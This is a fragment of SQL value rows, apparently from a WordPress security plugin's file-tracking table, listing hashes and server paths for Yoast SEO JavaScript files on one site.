('¹ ¹\Zy‡5ry"Nsúúò', 'wp-content/plugins/wordpress-seo/js/dist/externals/analysis.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/analysis.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ãx	y+3 @ŽKŠÝ', '¥Rúp1ße¢"Ÿ-\0AÕh‚x€•ö¡òþzM¥p', '', 0, '?'),
(',8Ð¤í¿¡üyRÖhÞ', 'wp-content/plugins/wordpress-seo/js/dist/externals/analysisReport.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/analysisReport.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸8Y}_{À.¶íQFs|', 'ÏiŒU‰n®¤Õ™}æpý‚÷íqâm¯Ê×øÚ è»', '', 0, '?'),
('Ö7ÀàÕðÔ\0¬Å¤s²é', 'wp-content/plugins/wordpress-seo/js/dist/externals/chart.js.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/chart.js.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒ—Õ¥—]©œß½Q`', 'Èï~‹+žRoûVßX”Â¡šC@ÜÂÔü¦.µ[	Ö', '', 0, '?'),
('ÈÓå “·sÇ¦IV$¾', 'wp-content/plugins/wordpress-seo/js/dist/externals/components.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/components.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´ØfÅ^d¢¨†Êk´u[¤J', 'a%l€õÆÇ,æŒdóaÏB‡<\\´½6é³­r%a', '', 0, '?'),
('î@¯Üo=üzŸ<F‚%', 'wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/componentsNew.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¾¦3G(öêW“x-«/=', 'Ì¶"MÀüœ” Š(ŒÜ›e¬Ëõê(ÁÇ/¤Væ', '', 0, '?'),
('>H¤™DœAJ^Q{ÙÕh', 'wp-content/plugins/wordpress-seo/js/dist/externals/draftJs.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/draftJs.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'wàÅ@’|Ht b', 'ï]Š~D¸÷8(éGìƒæÚîÍ+{¢s]ïñÚ|}=K:', '', 0, '?'),
('ßÑ‹çÁ÷z4ì 	UF', 'wp-content/plugins/wordpress-seo/js/dist/externals/featureFlag.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/featureFlag.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gëáñç"=«mš	àäI', 'Œ[„	^\rKsäI£ùT­Î/“õ~‘—Í:‰Ê', '', 0, '?'),
('ïÌ¸›WTºÔ¢4s«í', 'wp-content/plugins/wordpress-seo/js/dist/externals/helpers.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/helpers.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+åà\0ÿ"k•¼ŽÎ/íÙ­b', 'nF‹j¥ÑN/\\)-£Úðè9í)•V¨2QÐ„K÷', '', 0, '?'),
('­–»ÛúÈäö6êÌ>ý4×', 'wp-content/plugins/wordpress-seo/js/dist/externals/jed.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/jed.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'as®rÖ‰í#e‰:0“eº', '„úUÂ6|ó©>¨‚¬×P²ÇÍÿË\\Á´á§s2ÒQ#', '', 0, '?'),
('r£$WæÅ3í+¬Y®]üñ', 'wp-content/plugins/wordpress-seo/js/dist/externals/propTypes.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/propTypes.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ã™“ŠÕ¾þÄÈ@^Ÿóf', 'ÅºŸŠ¾™]pÑÆ¯ž‚\r¤xzûÓÀB-poÇFé/!u', '', 0, '?'),
('Ø.÷6LüÓX…nµEf', 'wp-content/plugins/wordpress-seo/js/dist/externals/reactHelmet.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/reactHelmet.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '^…X%•–&™É}ú™)ç@', '`à{¥øHèöþÈ´ùàO!˜\Z®LnÏùRÀÔc', '', 0, '?'),
('¨ª\\¼|L§há2™w½', 'wp-content/plugins/wordpress-seo/js/dist/externals/redux.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/redux.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ù>=!C_K¢%½C/', 'Eí²û¿jcž†@|ï¨Xj¥]ëîšp.ˆM,cbÁóV,ø', '', 0, '?'),
('QefÎX_«ïÊÙƒY&á', 'wp-content/plugins/wordpress-seo/js/dist/externals/reduxJsToolkit.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/reduxJsToolkit.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '`H<_æ Â‘øÌ7È:ŸŽ', '»SâOÛŒÿP]´™¡æ%>ÂÏ†+n¯IÓT¯Aµ', '', 0, '?'),
('4_…Ë}\0èÛÊªQ®÷€!M', 'wp-content/plugins/wordpress-seo/js/dist/externals/replacementVariableEditor.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/replacementVariableEditor.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xZ(Ô«^_¤—=µ®¦', '¹óãîRG‘Ø@é°èÕÆ[b´BÚ+²|¾&jŽ', '', 0, '?'),
('ÅÔU„¬E~°‹ÿ-²`', 'wp-content/plugins/wordpress-seo/js/dist/externals/searchMetadataPreviews.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/searchMetadataPreviews.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'l·X"ðˆÁ»Dué·³\ZÓ¿', 'ºÇ€¾»ª_ÊóùÈ;ÿ7êî‰Ü{›E§õ«fqó', '', 0, '?'),
('—âR×ãö”ØuÌçÃN', 'wp-content/plugins/wordpress-seo/js/dist/externals/socialMetadataForms.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/socialMetadataForms.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'T³ôÌ\n{wÙ­v¿+·¨%', '‡_;Ÿºó-ðÝ®’ÿ6ÇCÈLº=¢aóR', '', 0, '?'),
('gø+Î_óP=¥yÍP…#', 'wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/styleGuide.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '<ÌkO''Ü2S*hØç;[„\\', '!^eL³ös•RÍˆH&­å7ªB¿¾’ƒŒDHQ…', '', 0, '?'),
('}Â“‘ØbÙ`£I-ù›0÷', 'wp-content/plugins/wordpress-seo/js/dist/externals/styledComponents.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/styledComponents.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¸],''¹÷5''Øí"þ‹T', '©Ð\Zîw1‚²ñ#z+1ß÷ÍºþÌ¼L.ëxèðwÆ', '', 0, '?'),
('Ú{×1Ñ*hM3–¨ö±Ë', 'wp-content/plugins/wordpress-seo/js/dist/externals/uiLibrary.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals/uiLibrary.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'lDxvohWžÇ~‘ÎWtù', 'Èsã`6“5nû•9==PN°”4Oßm‚=ˆ', '', 0, '?'),
('¢xYüö4å(RMj2}5}', 'wp-content/plugins/wordpress-seo/js/dist/externals-components.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals-components.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b×ŒGª±í@ðyðf', 'â­\rLA¦ØÊD“oÉ3Î3ÒûÕ¢X¼8óÊ§]hS4t÷', '', 0, '?'),
('y–ôVö|/¡N/âî…¹', 'wp-content/plugins/wordpress-seo/js/dist/externals-contexts.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals-contexts.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@@¡8XÁÏÙµy]í', 'Í0ÍÊkòå”uPIPQ{!äÕ¥@[æ\nm', '', 0, '?'),
('îÉ¹ƒÛg¢ú»~.³2ù', 'wp-content/plugins/wordpress-seo/js/dist/externals-redux.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/externals-redux.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”‹™¡’=ä—Òñ©)2"]ü', '›¤8¨Œ\0$eFfqwòËÞ~¥Ò‡&Uú_üø', '', 0, '?'),
('Û¯›Å—¤2M¾—K§f²¼', 'wp-content/plugins/wordpress-seo/js/dist/filter-explanation.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/filter-explanation.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '~ÁØö’«jâîÀ3I', ']PêõÑÞ²Š2+Çý¯1t0´ˆ[ƒpƒžEÒà', '', 0, '?'),
('øJSsž¶G.J\00ˆ‰!“', 'wp-content/plugins/wordpress-seo/js/dist/first-time-configuration.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/first-time-configuration.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7¾\Z`"ÆºŠF5Ð£T', '‘0"×JßuÐ~v›O%\r.(.Þ7U>ä³€Ï¹ëÃ', '', 0, '?'),
('|Ãî3·2é„^qjþÚç', 'wp-content/plugins/wordpress-seo/js/dist/frontend-inspector-resources.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/frontend-inspector-resources.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(²çòC#‰{ÂÅ\r`ö', 'üù€üyw¨%ÓÁŠhûÙíž.Ö^±H›\\š·¶ð.û', '', 0, '?'),
('ÆÖgvÎ.ÙŽ–¹¹K', 'wp-content/plugins/wordpress-seo/js/dist/help-scout-beacon.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/help-scout-beacon.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'v	4GfòsÉo®iÐ', '©ÂñÚ<ÝÛŸCúóúë¨kSÖOKÞD–¦	Êÿõ:', '', 0, '?'),
('¨hI0Š·J2’ä[o­õÓ	', 'wp-content/plugins/wordpress-seo/js/dist/import.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/import.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$<-ƒ–ÚEŸk(\n}ò', 'ÎJãÖ 6®á´n!ñ¡9r­q§ä–d÷að/õà[', '', 0, '?'),
('€ŽBþÄzÏåqt¶½ÿÛ', 'wp-content/plugins/wordpress-seo/js/dist/indexation.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/indexation.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '«GÈÑæ-)±R£7?»\n', 'â:r]Ü\rö—F!2ÄÎ­¬ò}¤SŠõmïD{xƒ¹', '', 0, '?'),
('o&þ;º;‡KÐâ|-%1}3', 'wp-content/plugins/wordpress-seo/js/dist/installation-success.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/installation-success.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'B ÚtßP	1TôÅN', 'vö›Ýú\06Ü«Ò†!oƒ´¤½Z7]úO$¼PyÒ', '', 0, '?'),
('ïbšÐ.‚ÄËÜè8éî', 'wp-content/plugins/wordpress-seo/js/dist/integrations-page.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/integrations-page.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÆGErV<£/)¬ÖÒBÜp', '1Øv(Æqðäi`uœS¦ÞJoè8‹ÂœÓËøž F…', '', 0, '?'),
('&$Ñ''=Ðö¹Ë¡õw', 'wp-content/plugins/wordpress-seo/js/dist/introductions.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/introductions.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2cK¹_†½—}Çb÷', 'šLóÍoÝ?…‡''v½tBæ›—w.\ZC"Ôò£', '', 0, '?'),
('qÁ[H\re[{ÛÄñ', 'wp-content/plugins/wordpress-seo/js/dist/languages/ar.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/ar.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ü¦q7QB:4}<ùîp', 'þ+xg¦†JvªO¨b\r‡teÎ¾—Ok÷âòVm', '', 0, '?'),
('L³[Ââš)Ú¢»ÞzÆ.', 'wp-content/plugins/wordpress-seo/js/dist/languages/ca.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/ca.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '5@dl˜L7ü¯ãÛ¸­v', ' Vóä„^öˆ¾y¶Û_\Zž(|¹&¢dfÚ×ï€Ü', '', 0, '?'),
('(1ÈðCt¹wtë2°?~', 'wp-content/plugins/wordpress-seo/js/dist/languages/cs.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/cs.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '#\0ÖŸ*½6B`äÙ!äÑTS', '¡Æ–/?·]ïR¶ÖÁ|"%0÷ªÄõD’D3ªë', '', 0, '?'),
('<]£L€ÁSsÚXÔ—aÙÓ', 'wp-content/plugins/wordpress-seo/js/dist/languages/de.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/de.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'á“¬ GÝÜîÈR^­Þ21ì', '…½ÇŠ–GTeet ¸¨L—!Š•.ÉVc¼“( Ee~|Ö', '', 0, '?'),
('ÉW-÷	<‡‚¸‘„Í', 'wp-content/plugins/wordpress-seo/js/dist/languages/default.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/default.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'CZj‰\ZÛP˜Rža†³¤o', 'w\nqÞ¬O–Ô½šÔ1«Q:°æêàÒp#j\ZDî !', '', 0, '?'),
('å´•ø?Ôç[Å“žPôi¸Î', 'wp-content/plugins/wordpress-seo/js/dist/languages/el.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/el.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£aÓ)Ûv.Å‚E–ÁŒÉ5', 'qVœyàþá“Fò“‡E¹¤Æ2ÛŸn0Gw—bÐS', '', 0, '?'),
('8(ñ­K…L._''%¦ù±', 'wp-content/plugins/wordpress-seo/js/dist/languages/en.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/en.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'äo.-5€Aƒo\Z:Q?kÌ', '¡¶@lªþ÷³ÀvÍc\r;u,NW%<sÀlñÊ²', '', 0, '?'),
('µ>®ùOàÛµ''Çð°©¥ð', 'wp-content/plugins/wordpress-seo/js/dist/languages/es.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/es.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'MC·©€Õ·KãŠÉx	‡Ã', '¤''¿d‰ù‡ª£WápÏÉfÈ_»×Œ[ÌÂ Š,?', '', 0, '?'),
(';fÖ\Zø=œskÕO', 'wp-content/plugins/wordpress-seo/js/dist/languages/fa.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/fa.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Åš«âð+UDK•Ä\rÿkåì', 'CH„Á0ÒloŸUDØÏÀî2µïSÃœçO{ml^', '', 0, '?'),
('U†Ã—HÜ mè¸H/ª', 'wp-content/plugins/wordpress-seo/js/dist/languages/fr.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/fr.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÉÝ¼ý¤/Ìôš$p$§Üu?', 'y¬ïs²òúy‰J!{ÿ!÷ä°®gL¤è¤½éÿÃŒJ', '', 0, '?'),
('3Š‰À\09öˆZÆA÷©†.', 'wp-content/plugins/wordpress-seo/js/dist/languages/he.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/he.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Âõm?LÎšÁuàAp÷', '¸åKë\nm$ð''_OBìœl©ÎAb‘:5\\?ï„di', '', 0, '?'),
('Z:cXÄLšãjÆÕçNc', 'wp-content/plugins/wordpress-seo/js/dist/languages/hu.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/hu.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 's³W?(07œúð*(', 'B›Ö¥vê&/\Z+hkãúÆ›—‹.Ÿ´1Ï!Þêý', '', 0, '?'),
('ó''^=h$žÎÍ$âhF†', 'wp-content/plugins/wordpress-seo/js/dist/languages/id.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/id.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '­%_éìOå¥õ:µ', 'Ø¿Y¥d„`…8üzm	PÂç³ÕœK-Íš±ÁOa', '', 0, '?'),
('Â™‰6F¹ZK[è©Íqà', 'wp-content/plugins/wordpress-seo/js/dist/languages/it.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/it.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'õ·¨òP\\M,ÅéÊp1', ' ¶ú­\\ç?¦³§C¹Ã=â>Èún4×©cq}5bg›', '', 0, '?'),
('ùDš·3‡°š$éìðÖ', 'wp-content/plugins/wordpress-seo/js/dist/languages/ja.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/ja.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†ñ–é¤·()…:×ð0', '|©ÿr¶ÁæÍ-eÅ”%·^Žu§±ÎïåÉ(».,6÷', '', 0, '?'),
('é¥.ôhûz£föÖ', 'wp-content/plugins/wordpress-seo/js/dist/languages/nb.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/nb.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '%‚U[¦ªã‰Sê%¢…Nj', 'ª\r~3EË«+7»Ï“çõ3NpÈ‘,4 [F1ö"— ', '', 0, '?'),
('`,8Viÿ4N¢œ¥ÆÄéPœ', 'wp-content/plugins/wordpress-seo/js/dist/languages/nl.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/nl.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'â÷/—8ã¦é‘gäDÄÄÞî', 'ÕïÛ»ÊÐ¡ËXŽÉVÉ”:”ðX”v=UÜE#(xµ‚¯', '', 0, '?'),
('Ï‡³¦¡y2Å™é—ðÚ', 'wp-content/plugins/wordpress-seo/js/dist/languages/pl.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/pl.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(`h0mÇNè«n†ÙóÅ«', 'Á%9Žyî$¼þžÚ¬Pjµh¤oùVj‹½P) ”m', '', 0, '?'),
('¼©£?t£NR„“R/', 'wp-content/plugins/wordpress-seo/js/dist/languages/pt.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/pt.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b´ŠS\0ÊØ¬öì)Šd½Ž', '¾“‹±[Ö<{½=™%§Éwr?Q7LG\nÿ†ç', '', 0, '?'),
('bäI˜ÁPØÌæÐG!¬¼H', 'wp-content/plugins/wordpress-seo/js/dist/languages/ru.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/ru.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰VÒ^_ôo±r×Ôº', '±+·^ã €Z0óç''üô¯@û‘ôIL˜ÕÕ³‰', '', 0, '?'),
('8\Z+«ôX/{™ë;ÇK', 'wp-content/plugins/wordpress-seo/js/dist/languages/sk.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/sk.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ê´|ç.ìU;8Ç¢22uäÁ', '½ïS‰—|Ë?Èp\Z-lTpzïqV¬#äLùª£ ‰žÆ', '', 0, '?'),
('¨XãN	Z³2fŸI', 'wp-content/plugins/wordpress-seo/js/dist/languages/sv.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/sv.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'é1E.­uÿÂ|7\nãkGU', ':"œmÇS\0{²·Ü»iþµ‰öïÿˆÀ+*žÎ4t', '', 0, '?'),
('&8HÓ§Â+Xzi\nˆ', 'wp-content/plugins/wordpress-seo/js/dist/languages/tr.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/languages/tr.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '²¼¹ü-{†©í+O-Ü', '–oô‹Ó‹_ƒ,˜9JŠ,Ñºp''_\\ zöÎUÉ›', '', 0, '?'),
('IeóýÃ™­±¾àQeF\n', 'wp-content/plugins/wordpress-seo/js/dist/network-admin.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/network-admin.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ö\n#œö’f¶gÜòïƒ¹ç', '%©¿=YZp%Î’úG+c¢Ï¤Yß/°¡Í<:c', '', 0, '?'),
('Áå·ôÉ¾r¤;–v|/‰', 'wp-content/plugins/wordpress-seo/js/dist/new-settings.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/new-settings.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Á½pÂí¢ýä™õÂHe}', 'Ê.Wç9ý*)w¾}²Õqy¾s±äŒ1iIÖk~_', '', 0, '?'),
('v).Žx³3Ô.#Ul„¤', 'wp-content/plugins/wordpress-seo/js/dist/post-edit.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/post-edit.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xáÒU].+¨c”¸£²ƒ', '÷þ„«´Øðh~¼eã3úâÌz€¾•þ".H¾I', '', 0, '?'),
('j‘B„À Æ\ZãÇqˆ', 'wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'qþ5¹G_õZBT–³£~i', 'ŠÖ6io˜¡,ŒþÇò\nèçåýDÔ§—Õ©—', '', 0, '?'),
('•äÏ÷Œ .‹hïÍ:3ú', 'wp-content/plugins/wordpress-seo/js/dist/react-select.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/react-select.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÎëÕ0J=lÖ¥°R\Z€', 'AF–A-p…Ž>²—k­&$˜’°˜\\\ZM—˜‰€{', '', 0, '?'),
('åÏÏÖ©&žIJvôÀk©3©', 'wp-content/plugins/wordpress-seo/js/dist/redirect-old-features-tab.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/redirect-old-features-tab.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÝÛgÂ·¼¼Ý¢˜Xbu', '@-lgp‰ÞŸùÏÅ71êw\ZÙ_Æ0§£Çãÿ\r‹*Ë5', '', 0, '?'),
('¤.«©ë†FÐg%Ý>', 'wp-content/plugins/wordpress-seo/js/dist/reindex-links.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/reindex-links.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '“W¼À½—›*b£¡kˆ', '·—(Â¾<ä8CÝë²×:ºxáAU8JaÉ\0¡ß™', '', 0, '?'),
('kgƒ@Hù]u7o5!\0Nõ&', 'wp-content/plugins/wordpress-seo/js/dist/settings.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/settings.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ç«c–„û"l:[ƒ5;°', '¼°Gö+º!™­ã¬ˆƒÄ6£Ê‡%½¦Ç-<€Hz', '', 0, '?'),
('¶^/b«þ/À8KžOÖQ', 'wp-content/plugins/wordpress-seo/js/dist/structured-data-blocks.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/structured-data-blocks.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '”‚A;z#ÏÅ2OWÿ¦''', '’TW!»~°\\,.to?Õ‚ú”´á\n¯9’ÛGA¿&', '', 0, '?'),
('Çè''Çm³ëdå§ŠËŸE—¥', 'wp-content/plugins/wordpress-seo/js/dist/support.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/support.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ä:ƒ?Ñ˜WðÝàÏ|Y–', '¯ŠâUî±	ƒ»È\rº–[‹[îö§âv=×çÒÒ\Zq', '', 0, '?'),
('Ø(ÙÂK¹o³ü5F', 'wp-content/plugins/wordpress-seo/js/dist/term-edit.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/term-edit.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '7tßñúq½ŠGusìË', 'ªj­¥7Êú\\‹•¥¿iÝËÈHÍ¡†OáÜÄß©Ê', '', 0, '?'),
('Ïõ<Ë·éu¥’©êQš¯£', 'wp-content/plugins/wordpress-seo/js/dist/used-keywords-assessment.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/used-keywords-assessment.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'öX îg¹uúøÒÚÅØgJñ', '‰ÁN?«)“ød¨D$àŒÌÑz[´mšÙšv•	°K', '', 0, '?'),
('‰èk z›T‚£ážãÅ', 'wp-content/plugins/wordpress-seo/js/dist/wincher-dashboard-widget.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/wincher-dashboard-widget.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '%bt*P®úa7AïèKÙÅ', 'ˆôW"òˆ`u±*kÛéz%Èás[ka)lžR<Ì', '', 0, '?'),
('’Jt´#nòm~™†Q0$', 'wp-content/plugins/wordpress-seo/js/dist/wordproof-uikit.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/wordproof-uikit.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '´£1×ÔkŽE;\\1ü.', 'â×sl4ÊMÒ³Ú•Ù­›61Y‚`Œ–Ê©ßbØÆ”4', '', 0, '?'),
('ð1ÌŠpH}EjirºÃ', 'wp-content/plugins/wordpress-seo/js/dist/workouts.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordpress-seo/js/dist/workouts.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÿ\\™áNoá:ßS‹¡‚&f:', '6@»þ˜*Ü9@H˜{¦À5M¾4(½/Kdôíî¤ÔGËd', '', 0, '?'),
